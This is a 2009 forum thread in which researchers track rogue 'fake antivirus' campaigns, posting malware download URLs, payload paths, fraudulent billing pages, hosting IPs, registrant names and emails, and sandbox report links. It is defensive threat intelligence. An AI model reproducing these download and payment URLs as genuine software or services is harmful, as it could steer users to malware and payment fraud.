hxxps://secure.premium-software-store.com/billing/?nh=1&id=
Wepawet (http://wepawet.iseclab.org/view.php?hash=841e7d0ab9c2e26a8314f50e5bdb848d&t=1243076914&type=js)
Registrant: Mikhail Peshkov / xors678@ freebbmail.com

Redirects to fraudulent payment page for Rogue AV

AS24940 (HETZNER)
78.47.172.66 [static.66.172.47.78.clients.your-server.de]
Code: [Select]
hxxp://systemsupportnetwork.com/1/
hxxp://brabusautomoto.cn/buy.php?nh=1&id=
Wepawet (http://wepawet.iseclab.org/view.php?hash=841e7d0ab9c2e26a8314f50e5bdb848d&t=1243076914&type=js)
Registrant: Edisson H Tom / tomahawk@ adeneli.com
Registrant: RoderickKiewiet@gmail.com

Redirects to Rogue:
78.47.172.66 [static.66.172.47.78.clients.your-server.de]
Code: [Select]
hxxp://advanedpromalwarescanner.com/go.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=83a91cc83212dd57d3899c793249c5e1&t=1243076034&type=js)
Registrant: Mikhail Peshkov xors678@ freebbmail.com

Rogue:
AS13237 (LAMBDANET)
83.133.126.155 [t529.1paket.com]
Code: [Select]
hxxp://anti-spyware-scan-v1.com/1/?id=11-1&smersh=e5880e7dd&back=%3DDQw2TzwMcQNMI%3DO
hxxp://anti-spyware-scan-v1.com/download.php?id=11-1
VirusTotal (http://www.virustotal.com/analisis/c03ac99c56ce7e0d7531cc486afbafb3162b887d6b471c03ebea537822880b83-1243075231) - 1/40 (2.50%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=41fce4c174d7f7bf45c19c1841cb0834&t=1243075786&type=js)
Anubis (http://anubis.iseclab.org/?action=result&task_id=17bc7e7e4ac0ab89405f5a9d6357e22ca&call=first)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 23, 2009, 06:14:53 pm
AS21844 (THEPLANET)
174.132.250.194 [c2.fa.84ae.static.theplanet.com]

redirectors for malwareremovalbot[.]com
Code: [Select]
hxxp://malwarebot.org/download.php
hxxp://malwaree.com/download.php
hxxp://malwaree.org/download.php
hxxp://remove-ie-security.com/download.php
hxxp://remove-malware-defender.com/download.php
hxxp://remove-ms-antispyware.com/download.php
hxxp://remove-personal-defender.com/download.php
hxxp://remove-spyware-guard.com/download.php
hxxp://remove-spyware-protect-2009.com/download.php
hxxp://remove-spyware-protect.com/download.php
hxxp://remove-system-guard.com/download.php
hxxp://remove-total-security.com/download.php
hxxp://remove-ultra-antivir-2009.com/download.php
hxxp://remove-virus-alarm.com/download.php
hxxp://remove-virus-melt.com/download.php
hxxp://remove-winpc-defender.com/download.php

and for antivirus360remover[.]com
Code: [Select]
hxxp://remove-a360.com/download.php
hxxp://remove-antivirus-360.com/download.php
hxxp://remove-av360.com/download.php
hxxp://smitfraudfixtool.com/install.php
hxxp://vundofixtool.com/install.php
hxxp://av360removaltool.com/install.php
hxxp://antivirus360remover.com/install.php

Private registration for all
Title: Re: Rogue - Fake AV
Post by: boston on May 26, 2009, 03:26:35 pm
xttp://noadware.net/noadware.exe
http://www.virustotal.com/analisis/2ec01a76368d7e3d3fce1029e92f9729a2dee1b6d5e267cb5bd5519f2c062e3a-1242866590
(xttp://deletespyware-adware.com)
*
xttp://antivirus-doktor.com/antivirusdoktor.exe
http://www.virustotal.com/analisis/16c890543d903c93e0b93bdb8260fc5c2ebea6d077173d67367adf7ed9501d69-1243323303
*
xttp://registry-doktor.com/registrycleanerdoktor.exe
http://www.virustotal.com/analisis/82b5ec3f2d01ea50a421d1b8c479fc710138377dd1317a3023f331f6d07f9bc6-1243337791
*
xttp://noadware.com/download/nans.exe
http://www.virustotal.com/analisis/ad5ba01c6615129946f89e31b58732d12572151cba2aa7af88915e95a43f8ab3-1241344756
Title: Re: Rogue - Fake AV
Post by: boston on May 26, 2009, 07:43:26 pm
xttp://adware-clean.com + xttp://adware-download.com redirect to xttp://adwarealert2009.com.
xttp://adwarealert2009.com/install.php
http://www.virustotal.com/analisis/5b0450e3118f78346f688a88a836ea1cc19a6f38ec1e2d65e3757201e07e70e9-1243353062
*
xttp://intelinet-secure.com/setup.exe
http://www.virustotal.com/analisis/be4688fe9a9d937e5aacd4faec7845eea60e7a912d89d9bc9fdd3a74b060e63d-1243343496
*
xttp://anti-virus-professional.com/antivirus-pro.exe
http://www.virustotal.com/analisis/c164fd4b13400166d249c1ebef94a0f0991fdddd6b1cd9f7467647aec4cac97f-1243343805
(related to xttp://noadware.net:
http://www.threatexpert.com/report.aspx?md5=2996f7cd047cd24c7117b1bbc1df64df)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 28, 2009, 06:11:40 am
AS10929 (NETELLIGENT)
209.44.126.102

Code: [Select]
keyscan4.info/download/install.php
scan4key.info/download/install.php
scanmeta4.info/download/install.php
scannote4.info/download/install.php
scan4auto.info/download/install.php
autoscan4.info/download/install.php
scan4fix.info/download/install.php
fix4scan.info/download/install.php
fixscan4.info/download/install.php
Registrant: William Leland / sitintu@ gmail.com

Code: [Select]
scangen4.info/download/install.php
gen4scan.info/download/install.php
genscan4.info/download/install.php
notescan4.info/download/install.php
Registrant: Edmund Moss / finewnrk@ gmail.com

Code: [Select]
scan4fine.info/download/install.php
scanauto4.info/download/install.php
scanflex4.info/download/install.php
flex4scan.info/download/install.php
Registrant: John Redwine / mexnacc@ gmail.com

VirusTotal (http://www.virustotal.com/analisis/250c373bbf6ce33aea746b8332fed73113b8238e4e6ead1e89b237846462854b-1243462297) - 5/39 (12.82%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=170f182eb213f96d4210ee1e34b51a8b1)

Redirects:
Code: [Select]
goautoscan.com
goscanauto.com
gofinescan.com
goflexscan.com
goscanfine.com
goscanflex.com
Registrant:
Claudio Canella / tanehen@ gmail.com
Enrico Schiru / canrcnad@ gmail.com
Francesco Carpa / alcnafuch@ gmail.com
Francesco Carpa / alcnafuch@ gmail.com
Gianluce Baruzi / chirelqas@ gmail.com
Gianluce Baruzi / chirelqas@ gmail.com

209.44.126.241
Code: [Select]
castsecurityshield.com/download.php
securityfastscan.com/download.php
Privacy Protect
Title: Re: Rogue - Fake AV
Post by: boston on May 29, 2009, 10:05:52 pm
xttp://adwareprofessional.com/adwareprofessional.exe (xttp://adware-2009.com)
(related to xttp://noadware.net:
http://www.threatexpert.com/report.aspx?md5=cd825dbc50e170b1d9e8902af3cce923)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 29, 2009, 10:28:06 pm
and related to registryfix[.]com
Code: [Select]
hxxp://web2.noadware.net
hxxp://web1.noadware.net

other files

downloader:
Code: [Select]
hxxp://www.noadware.net/clicks/o.php?http://www.noadware.net/noadware.exe
VirusTotal (http://www.virustotal.com/analisis/2ec01a76368d7e3d3fce1029e92f9729a2dee1b6d5e267cb5bd5519f2c062e3a-1243635775) - 5/40 (12.5%)

config:
Code: [Select]
hxxp://noadware.net/def/noadware4_052909.na.zip
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 07, 2009, 08:43:25 am
AS29131 (RAPIDSWITCH)

78.129.166.166

Code: [Select]
antivir-soft.com
antivirus-protection-tools.com
mybest-adult.com
mybigportal.com
mytop-porn.com
porn-hub-online.com
porn-tubes-hub.com
top-portalnet.com
universal-antivirus.com

payloads:

/promo1/get.php
/promo2/get.php
/promo3/get.php
/promo4/get.php

AS10929 (NETELLIGENT)

209.44.126.36
Code: [Select]
virtualinternetsecurity.com
topsvirusdefender.com

payload: download.php

209.44.126.22
Code: [Select]
yoursecuritydisability.com
payload: download.php

209.44.126.104
Code: [Select]
scan4hard.info
scan4mode.info
scan4full.info
fine4scan.info
one4scan.info
scanfine4.info
scanone4.info
scanpage4.info
scan4goal.info
scan4area.info

payload: /download/install.php

209.44.126.102

Code: [Select]
hard4scan.info
scanstar6.info
scanray6.info
scanmix6.info
scanfan6.info
scan6meta.info
note6scan.info
meta6scan.info

payload: /download/install.php

89.149.207.213 ¨[89-149-207-213.internetserviceteam.com] - AS28753 (NETDIRECT)

Code: [Select]
acyikap.cn
adiuqga.cn
adocyha.cn
exeype.cn
fevopru.cn
gebomuk.cn
friskdiseasestore.cn

payload: installer_1.exe

AS16265 (LEASEWEB)

94.75.221.73 
Code: [Select]
scanspywaresonline.com/demo.php?ewmid=205
scanspywaresonline.com/download/10520/205/AntiSpywarePro_Installer_eng.exe

94.75.209.11 - (fraudulent payment page)

Code: [Select]
secure.xsoftstore.com/cgi-bin/bill.cgi?id=33&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=34&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=35&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=36&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=40&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=43&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=49&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=55&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=61&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=73&type=cc
secure.xsoftstore.com/cgi-bin/bill.cgi?id=39_42&type=cc

94.75.209.11 - redirects
Code: [Select]
seresult.com/go.php
94.75.209.11 - rogue
Code: [Select]
scanner.extrantivirus.com/35/?advid=6357&ref=&p=1000000000
scanner.extrantivirus.com/exe/setup_26357_0.exe
scanner.rapidantivirus-09.com/33/
scanner.rapidantivirus-09.com/setup/install_511_MHwzM3wwfHx8fHx8fHw_.exe
scanner.rapid-antivir-2009.com/33/
scanner.rapid-antivir-2009.com/setup/install_511_MHwzM3wwfHx8fHx8fHw_.exe

AS30407 (VELCOM)

Code: [Select]
virusdoctor-onlinedefender.com/?p=WKmimHVlaGmSYJacV5GPlqR1sXCjhHOuU8/XoGddoami2NmRglqbnZxxmpiqcps=
virusdoctor-onlinedefender.com/build6_1001326.php
pro-antivirus.net/?p=WKmimHVlaGuHjsbIo22Dh3qBqXmmVpzZapmK0qR0qay6z66noaunWpqdnHbDjLnUnJ6cq6A=
fast-antivirus.com/?p=WKmimHVlaGuHjsbIo22Dh3qBqXmmVpzZapmK0qR0qay6z66noaunWpqdnHbDjLnUnJ6cq6A=
fra22.net/?pid=3&uid=1001326&abbr=EXAVR
pay1.fastantivirus09.com/lo/FASTAV/1/index.php?pc_id=&uid=0&ls=1&bid=b_Unknown&t=day&np=&pid=3&sid=&wv=wvUnKnown&verint=&presale_id=6&abbr=FASTAV&pid=3

config for rogue (listed)

Code: [Select]
updvms.cn
updvms.net

payloads for updvms.cn:

Quote
/EXAVR/ActivatedRelease.exe
/EXAVR/ActivatedReleaseXP.exe
/EXAVR/ActivatedSetup.exe
/EXAVR/ActivatedSetupRelease.cab
/EXAVR/ActivatedSetupRelease.exe
/EXAVR/ActivatedSetupReleaseXP.cab
/EXAVR/ActivatedSetupReleaseXP.exe
/EXAVR/BankSetupRelease.exe
/EXAVR/Release.exe
/EXAVR/ReleaseXP.exe
/EXAVR/SetupPack.exe
/EXAVR/SetupRelease.cab
/EXAVR/SetupRelease.exe
/EXAVR/SetupReleaseXP.cab
/EXAVR/SetupReleaseXP.exe
/EXAVR/Work.exe
/EXAVR/setup.exe
/EXAVR/uninstall.exe
/EXAVR/update.exe
/FASTAV/ActivatedRelease.exe
/FASTAV/ActivatedReleaseXP.exe
/FASTAV/ActivatedSetup.exe
/FASTAV/ActivatedSetupRelease.cab
/FASTAV/ActivatedSetupRelease.exe
/FASTAV/ActivatedSetupReleaseXP.cab
/FASTAV/ActivatedSetupReleaseXP.exe
/FASTAV/Release.exe
/FASTAV/ReleaseXP.exe
/FASTAV/SetupPack.exe
/FASTAV/SetupRelease.cab
/FASTAV/SetupRelease.exe
/FASTAV/SetupReleaseXP.cab
/FASTAV/SetupReleaseXP.exe
/FASTAV/Work.exe
/FASTAV/uninstall.exe
/FASTAV/update.exe
/MCATCH/ActivatedRelease.exe
/MCATCH/ActivatedReleaseXP.exe
/MCATCH/ActivatedSetup.exe
/MCATCH/ActivatedSetupRelease.cab
/MCATCH/ActivatedSetupRelease.exe
/MCATCH/ActivatedSetupReleaseXP.cab
/MCATCH/ActivatedSetupReleaseXP.exe
/MCATCH/Release.exe
/MCATCH/ReleaseXP.exe
/MCATCH/SetupPack.exe
/MCATCH/SetupRelease.cab
/MCATCH/SetupRelease.exe
/MCATCH/SetupReleaseXP.cab
/MCATCH/SetupReleaseXP.exe
/MCATCH/Work.exe
/MCATCH/uninstall.exe
/MCATCH/update.exe
/PRTUP/ActivatedReleaseXP.exe
/PRTUP/ActivatedSetup.exe
/PRTUP/ActivatedSetupReleaseXP.cab
/PRTUP/ActivatedSetupReleaseXP.exe
/PRTUP/ReleaseXP.exe
/PRTUP/SetupRelease.exe
/PRTUP/SetupReleaseXP.cab
/PRTUP/SetupReleaseXP.exe
/PRTUP/Work.exe
/PRTUP/uninstall.exe
/PRTUP/update.exe
/UA2009/ActivatedRelease.exe
/UA2009/ActivatedReleaseXP.exe
/UA2009/ActivatedSetup.exe
/UA2009/ActivatedSetupRelease.cab
/UA2009/ActivatedSetupRelease.exe
/UA2009/ActivatedSetupReleaseXP.cab
/UA2009/ActivatedSetupReleaseXP.exe
/UA2009/Release.exe
/UA2009/ReleaseXP.exe
/UA2009/Rpdm.exe
/UA2009/SetupRelease.cab
/UA2009/SetupRelease.exe
/UA2009/SetupReleaseXP.cab
/UA2009/SetupReleaseXP.exe
/UA2009/Work.exe
/UA2009/setup.exe
/UA2009/setup1.exe
/UA2009/uninstall.exe
/UA2009/update.exe
/VALARM/ActivatedRelease.exe
/VALARM/ActivatedReleaseXP.exe
/VALARM/ActivatedSetup.exe
/VALARM/ActivatedSetupRelease.cab
/VALARM/ActivatedSetupRelease.exe
/VALARM/ActivatedSetupReleaseXP.cab
/VALARM/ActivatedSetupReleaseXP.exe
/VALARM/Release.exe
/VALARM/ReleaseXP.exe
/VALARM/SetupRelease.cab
/VALARM/SetupRelease.exe
/VALARM/SetupReleaseXP.cab
/VALARM/SetupReleaseXP.exe
/VALARM/Work.exe
/VALARM/uninstall.exe
/VALARM/update.exe
/VMLT/ActivatedRelease.exe
/VMLT/ActivatedReleaseXP.exe
/VMLT/ActivatedSetup.exe
/VMLT/ActivatedSetupRelease.cab
/VMLT/ActivatedSetupRelease.exe
/VMLT/ActivatedSetupReleaseXP.cab
/VMLT/ActivatedSetupReleaseXP.exe
/VMLT/Release.exe
/VMLT/ReleaseXP.exe
/VMLT/SetupRelease.cab
/VMLT/SetupRelease.exe
/VMLT/SetupReleaseXP.cab
/VMLT/SetupReleaseXP.exe
/VMLT/Work.exe
/VMLT/setup.exe
/VMLT/uninstall.exe
/VMLT/update.exe
/VSHIELD/ActivatedRelease.exe
/VSHIELD/ActivatedReleaseXP.exe
/VSHIELD/ActivatedSetup.exe
/VSHIELD/ActivatedSetupRelease.cab
/VSHIELD/ActivatedSetupRelease.exe
/VSHIELD/ActivatedSetupReleaseXP.cab
/VSHIELD/ActivatedSetupReleaseXP.exe
/VSHIELD/Release.exe
/VSHIELD/ReleaseXP.exe
/VSHIELD/SetupPack.exe
/VSHIELD/SetupRelease.cab
/VSHIELD/SetupRelease.exe
/VSHIELD/SetupReleaseXP.cab
/VSHIELD/SetupReleaseXP.exe
/VSHIELD/Work.exe
/VSHIELD/uninstall.exe
/VSHIELD/update.exe
/VSWEEPR/ActivatedRelease.exe
/VSWEEPR/ActivatedReleaseXP.exe
/VSWEEPR/ActivatedSetup.exe
/VSWEEPR/ActivatedSetupRelease.cab
/VSWEEPR/ActivatedSetupRelease.exe
/VSWEEPR/ActivatedSetupReleaseXP.cab
/VSWEEPR/ActivatedSetupReleaseXP.exe
/VSWEEPR/Instructions.ini
/VSWEEPR/Release.exe
/VSWEEPR/ReleaseXP.exe
/VSWEEPR/SetupPack.exe
/VSWEEPR/SetupRelease.cab
/VSWEEPR/SetupRelease.exe
/VSWEEPR/SetupReleaseXP.cab
/VSWEEPR/SetupReleaseXP.exe
/VSWEEPR/Work.exe
/VSWEEPR/uninstall.exe
/VSWEEPR/update.exe

payloads for updvms.net:

Quote
/FASTAV/ActivatedRelease.exe
/FASTAV/ActivatedReleaseXP.exe
/FASTAV/ActivatedSetup.exe
/FASTAV/ActivatedSetupRelease.cab
/FASTAV/ActivatedSetupRelease.exe
/FASTAV/ActivatedSetupReleaseXP.cab
/FASTAV/ActivatedSetupReleaseXP.exe
/FASTAV/Release.exe
/FASTAV/ReleaseXP.exe
/FASTAV/SetupPack.exe
/FASTAV/SetupRelease.cab
/FASTAV/SetupRelease.exe
/FASTAV/SetupReleaseXP.cab
/FASTAV/SetupReleaseXP.exe
/FASTAV/Work.exe
/FASTAV/uninstall.exe
/FASTAV/update.exe
/MCATCH/ActivatedRelease.exe
/MCATCH/ActivatedReleaseXP.exe
/MCATCH/ActivatedSetup.exe
/MCATCH/ActivatedSetupRelease.cab
/MCATCH/ActivatedSetupRelease.exe
/MCATCH/ActivatedSetupReleaseXP.cab
/MCATCH/ActivatedSetupReleaseXP.exe
/MCATCH/Release.exe
/MCATCH/ReleaseXP.exe
/MCATCH/SetupPack.exe
/MCATCH/SetupRelease.cab
/MCATCH/SetupRelease.exe
/MCATCH/SetupReleaseXP.cab
/MCATCH/SetupReleaseXP.exe
/MCATCH/Work.exe
/MCATCH/uninstall.exe
/MCATCH/update.exe
/PRTUP/ActivatedReleaseXP.exe
/PRTUP/ActivatedSetup.exe
/PRTUP/ActivatedSetupReleaseXP.cab
/PRTUP/ActivatedSetupReleaseXP.exe
/PRTUP/ReleaseXP.exe
/PRTUP/SetupRelease.exe
/PRTUP/SetupReleaseXP.cab
/PRTUP/SetupReleaseXP.exe
/PRTUP/Work.exe
/PRTUP/uninstall.exe
/PRTUP/update.exe
/UA2009/ActivatedRelease.exe
/UA2009/ActivatedReleaseXP.exe
/UA2009/ActivatedSetup.exe
/UA2009/ActivatedSetupRelease.cab
/UA2009/ActivatedSetupRelease.exe
/UA2009/ActivatedSetupReleaseXP.cab
/UA2009/ActivatedSetupReleaseXP.exe
/UA2009/Release.exe
/UA2009/ReleaseXP.exe
/UA2009/Rpdm.exe
/UA2009/SetupRelease.cab
/UA2009/SetupRelease.exe
/UA2009/SetupReleaseXP.cab
/UA2009/SetupReleaseXP.exe
/UA2009/Work.exe
/UA2009/setup.exe
/UA2009/setup1.exe
/UA2009/uninstall.exe
/UA2009/update.exe
/VALARM/ActivatedRelease.exe
/VALARM/ActivatedReleaseXP.exe
/VALARM/ActivatedSetup.exe
/VALARM/ActivatedSetupRelease.cab
/VALARM/ActivatedSetupRelease.exe
/VALARM/ActivatedSetupReleaseXP.cab
/VALARM/ActivatedSetupReleaseXP.exe
/VALARM/Release.exe
/VALARM/ReleaseXP.exe
/VALARM/SetupRelease.cab
/VALARM/SetupRelease.exe
/VALARM/SetupReleaseXP.cab
/VALARM/SetupReleaseXP.exe
/VALARM/Work.exe
/VALARM/uninstall.exe
/VALARM/update.exe
/VMLT/ActivatedRelease.exe
/VMLT/ActivatedReleaseXP.exe
/VMLT/ActivatedSetup.exe
/VMLT/ActivatedSetupRelease.cab
/VMLT/ActivatedSetupRelease.exe
/VMLT/ActivatedSetupReleaseXP.cab
/VMLT/ActivatedSetupReleaseXP.exe
/VMLT/Release.exe
/VMLT/ReleaseXP.exe
/VMLT/SetupRelease.cab
/VMLT/SetupRelease.exe
/VMLT/SetupReleaseXP.cab
/VMLT/SetupReleaseXP.exe
/VMLT/Work.exe
/VMLT/setup.exe
/VMLT/uninstall.exe
/VMLT/update.exe
/VSHIELD/ActivatedRelease.exe
/VSHIELD/ActivatedReleaseXP.exe
/VSHIELD/ActivatedSetup.exe
/VSHIELD/ActivatedSetupRelease.cab
/VSHIELD/ActivatedSetupRelease.exe
/VSHIELD/ActivatedSetupReleaseXP.cab
/VSHIELD/ActivatedSetupReleaseXP.exe
/VSHIELD/Release.exe
/VSHIELD/ReleaseXP.exe
/VSHIELD/SetupPack.exe
/VSHIELD/SetupRelease.cab
/VSHIELD/SetupRelease.exe
/VSHIELD/SetupReleaseXP.cab
/VSHIELD/SetupReleaseXP.exe
/VSHIELD/Work.exe
/VSHIELD/uninstall.exe
/VSHIELD/update.exe
/VSWEEPR/ActivatedRelease.exe
/VSWEEPR/ActivatedReleaseXP.exe
/VSWEEPR/ActivatedSetup.exe
/VSWEEPR/ActivatedSetupRelease.cab
/VSWEEPR/ActivatedSetupRelease.exe
/VSWEEPR/ActivatedSetupReleaseXP.cab
/VSWEEPR/ActivatedSetupReleaseXP.exe
/VSWEEPR/Release.exe
/VSWEEPR/ReleaseXP.exe
/VSWEEPR/SetupPack.exe
/VSWEEPR/SetupRelease.cab
/VSWEEPR/SetupRelease.exe
/VSWEEPR/SetupReleaseXP.cab
/VSWEEPR/SetupReleaseXP.exe
/VSWEEPR/Work.exe
/VSWEEPR/uninstall.exe
/VSWEEPR/update.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 07:07:48 am
AS48669 NTCOLO

Rogue / Fraud

194.165.4.140
Code: [Select]
hxxp://wopayment.com
194.165.4.41
Code: [Select]
hxxp://windoptimizer.com
hxxp://woptim.com

194.165.4.224
Code: [Select]
hxxp://data-saver.org
hxxp://databackuper.com
hxxp://genantivirus.com

194.165.4.77
Code: [Select]
hxxp://homepcupdate.com/file.exe
hxxp://homepcupdate.com/codec.exe
hxxp://homepcupdate.com/pcdef.exe
hxxp://homepcupdate.com/codec/197.exe

http://www.virustotal.com/analisis/0c3f935bf9a18c380742de542326542cd92ef2fbb172b9a5a659f928df6bab55-1244170030 (http://www.virustotal.com/analisis/0c3f935bf9a18c380742de542326542cd92ef2fbb172b9a5a659f928df6bab55-1244170030)
http://www.virustotal.com/analisis/3f952397ee3a0fab7f828977e96d278be7e60f43de6f495c1fb7e7579cfcf616-1244170022 (http://www.virustotal.com/analisis/3f952397ee3a0fab7f828977e96d278be7e60f43de6f495c1fb7e7579cfcf616-1244170022)
http://www.virustotal.com/analisis/b579633e1705f3fedcbf74dd09ae3981ce70069043ea49eb508678f5f40db070-1244170039 (http://www.virustotal.com/analisis/b579633e1705f3fedcbf74dd09ae3981ce70069043ea49eb508678f5f40db070-1244170039)
http://www.virustotal.com/analisis/afa98707ece05cc2e0645e0d1fc2b9be3f4c14c1dcc33b0094a3b0fc053eabb9-1244170010 (http://www.virustotal.com/analisis/afa98707ece05cc2e0645e0d1fc2b9be3f4c14c1dcc33b0094a3b0fc053eabb9-1244170010)

http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=194.165&colsearch=All&ascordesc=ASC&quantity=100&page=0
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 07:29:21 am
redirects to rogue
Code: [Select]
hxxp://nakedfridaydresscode.com/in.cgi?6
hxxp://thetrafficcontrol.net/in.cgi?6
hxxp://promodomain.info/in.cgi?6
hxxp://allvideo.org.uk/in.cgi?6
hxxp://blackporn1.com/in.cgi?6
hxxp://blackpornmix.com/in.cgi?6
hxxp://a7ii.info/dintest/
hxxp://freshstats1.com/redirect2/

222.73.219.58
Code: [Select]
hxxp://googleactive.com/private_default_x.php?6
hxxp://dressnowbeach.cn/in.cgi?6
hxxp://palaceclub.cn/in.cgi?6
hxxp://workforex.cn/in.cgi?6
hxxp://millionsdream.cn/in.cgi?6
hxxp://pharmacyeasy.cn/in.cgi?6
hxxp://wowneo.cn/in.cgi?6
hxxp://nailimpro.cn/in.cgi?6
hxxp://forexsec.cn/in.cgi?6
hxxp://traveltravet.cn/in.cgi?6
hxxp://tripsstart.cn/in.cgi?6

217.20.113.236
Code: [Select]
hxxp://yourbestway.su/bestway.js

78.159.114.140
Code: [Select]
hxxp://farmauts.info/bestway.js
hxxp://aboutauts.info/bestway.js
hxxp://aboutauts.info/in.cgi?3

94.76.213.104
Code: [Select]
hxxp://everylog1.com/in.cgi?9
hxxp://everylog1.com/redirect2/

205.177.124.46
Code: [Select]
hxxp://barba.tv/AntonellaBarbaBlowjob1.avi
hxxp://avrilnude.net/AvrilNude1.avi
hxxp://barba.in/AntonellaBarbaBlowjob2.avi
hxxp://britneyshaved.com/BritneySpearsPussy1.avi
hxxp://britneyexposed.org/BritneyExposedVideo2.avi
hxxp://bestbritneypics.com/BritneyVideo2.avi
hxxp://freecelebsvideo.com/BritneyVideo2.avi
hxxp://parisvideo.org/ParisVideo-1.avi

83.133.123.140
Code: [Select]
hxxp://privateaolemail.cn/go.php?id=2019&key=572c78987&p=1
205.177.124.46

fraud
Code: [Select]
hxxp://secure.bestbuysystem.com/buy.php?nh=1&id=
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 08:02:54 am
hello to liveinternetupdates[.]com

http://anubis.iseclab.org/?action=result&task_id=1fec51e60b0b88d5441807b30e7942146

Code: [Select]
antimalwareinternetproscanv3.com/1/?id=2004&smersh=bdf6da8d5&back==DQ51TD2NYQMMI=N
antimalwareinternetproscanv3.com/download.php?id=2004
antimalwareinternetproscanv3.com/download/Setup-30a9_02004.exe
anti-malware-internet-scanv3.com/1/?id=2004&smersh=bdf6da8d5&back==DQ51TD2NYQMMI=N
anti-malware-internet-scanv3.com/download/Setup-30a9_02004.exe

AS10929

209.44.126.102
Code: [Select]
area4scan.info/download/install.php
goal4scan.info/download/install.php
intoscan4.info/download/install.php
port4scan.info/download/install.php

209.44.126.104
Code: [Select]
scan4port.info/download/install.php
Code: [Select]
safetyscanguide.com/download.php
safetyscanguide.com/install/ws.exe
securetopshield.com/download.php
securetopshield.com/install/ws.exe
ourbestsecurityshield.com/download.php
ourbestsecurityshield.com/install/ws.exe
wifisecurityscan.com/download.php
wifisecurityscan.com/install/ws.exe

Wepawet (http://wepawet.iseclab.org/view.php?hash=921517e2aa4b6f2affeb92a5ae0bddb1&t=1244702322&type=js)
VirusTotal (http://www.virustotal.com/analisis/cd43e17d4ed7bac08407430842310c3e7df348de3733ff8a403b02e4f3e8a77a-1244702427)
Anubis (http://anubis.iseclab.org/?action=result&task_id=10ff8a6c84f9c5624fd33c0e91ffe6f1c)

ns for malware domain

ns1.ahuliard.com
ns2.ahuliard.com
ns1.godsecurityarchive.com
ns2.godsecurityarchive.com

38.105.19.27
Code: [Select]
scan6tool.info/download/install.php
scan6true.info/download/install.php
scantool6.info/download/install.php
scantrue6.info/download/install.php
tool6scan.info/download/install.php
toolscan6.info/download/install.php
true6scan.info/download/install.php
truescan6.info/download/install.php

84.16.234.27
Code: [Select]
adiosma.cn/installer_1.exe
gefvoqi.cn/installer_1.exe
gethufi.cn/installer_1.exe
gewolu.cn/installer_1.exe
gisahu.cn/installer_1.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 10:50:12 am
redirects to hi-my-tube[.]com then exe-file-boom[.]com

205.177.124.46
Code: [Select]
hxxp://antonella.tv/AntonellasVideo.avi
hxxp://jennavideos.org/JennaJamesonVideo18.avi
hxxp://katiereesphotos.org/KatieReesVideo1.avi
Wepawet (http://wepawet.iseclab.org/view.php?hash=743465e2f094dee797af771fac9ca1ed&t=1244716943&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=3d37508af0bf2867008a2c45db4b9753&t=1244717002&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=402177dbfa0886a28a68d27983bc978b&t=1244717178&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on June 11, 2009, 11:37:48 am
AS21788 (NOC) - 64.191.92.197 [64-191-92-197.hostnoc.net]

Rogue aka "MS AntiSpyware 2009" (CrucialSoft Ltd):

(http://www.threatexpert.com/getimage.aspx?uid=6e07e6ea-6afd-4e28-b673-2d629ee7d15d&image=screen&sub=1)

ThreatExpert (http://www.threatexpert.com/report.aspx?md5=2fb1ec492f7f919598bc18cc0ea2b7f2)

Quote
Sections ( UPX0 UPX1 .rsrc  )
File:   MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit, UPX compressed
   Strings:.php?,T
   Strings:<assemblyIdentity type="win32" name="KOL" version="1.0.0.0" processorArchitecture="*"/>
   Strings:<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" publicKeyToken="6595b64144ccf1df" language="*" processorArchitecture="*"/>
   Strings:UNPACKED .exe
   Strings:UNPACKED hxxp://dl.%s/get/?pin=%s&lnd=%s
   Strings:UNPACKED hxxp://int.
   Strings:UNPACKED <PROGRAMFILES>\sniffem\sniffem.exe
   Strings:UNPACKED <PROGRAMFILES>\Effetech http sniffer\ehsniffer.exe
   Strings:UNPACKED <PROGRAMFILES>\GJPsoft\ultranetsniffer\netpryer.exe
   Strings:UNPACKED Software\Microsoft\Windows\CurrentVersion\Run
   Strings:UNPACKED Software\Microsoft\Windows\CurrentVersion\Drivers\Video\Options\
   Strings:UNPACKED _addon.exe
   Strings:UNPACKED regsvr32.exe
   Strings:UNPACKED stat.php?
Size:   60416 bytes,
MD5:   2fb1ec492f7f919598bc18cc0ea2b7f2

VirusTotal (http://www.virustotal.com/analisis/8cf3e57e16338249395b966fab146f8d40fab54c1b6e034690ec7a363822023d-1244326002) - 31/38 (81.58%)

Code: [Select]
hxxp://1-againstspy.net/setup_1.exe
hxxp://1-antispystore.com/setup_1.exe
hxxp://1-antspy2008.com/setup_1.exe
hxxp://2-againstspy.net/setup_1.exe
hxxp://2-agentprotect.net/setup_1.exe
hxxp://againstspy.net/setup_1.exe
hxxp://agentprotect.net/setup_1.exe
hxxp://antspy2008.com/setup_1.exe
hxxp://mas2009.com/setup_1.exe
hxxp://myspyguard.com/setup_1.exe
hxxp://webspyguard.com/setup_1.exe

other domain on this IP:

Rogue InternetAntivirusPro
Code: [Select]
